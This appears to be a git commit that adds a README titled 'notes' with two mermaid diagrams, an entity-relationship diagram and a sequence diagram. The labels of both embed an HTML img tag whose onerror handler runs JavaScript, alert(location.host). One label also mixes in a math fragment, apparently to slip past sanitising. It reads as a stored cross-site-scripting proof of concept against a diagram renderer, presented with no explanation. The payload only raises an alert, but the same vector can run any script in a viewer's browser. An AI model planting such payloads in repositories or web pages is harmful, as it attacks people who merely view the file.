add notes

This commit is contained in:
2026-09-27 10:11:45 +00:00
commit 9b1cfa3d24

12
README.md Normal file
View File

@@ -0,0 +1,12 @@
notes
```mermaid
erDiagram
A ||--o{ B : "<img src=x onerror=window.__mx||(window.__mx=1,alert(location.host))>"
```
```mermaid
sequenceDiagram
participant A as Alice<img src=x onerror=window.__mx||(window.__mx=1,alert(location.host))>$$\text{A}$$
A->>B: hi
```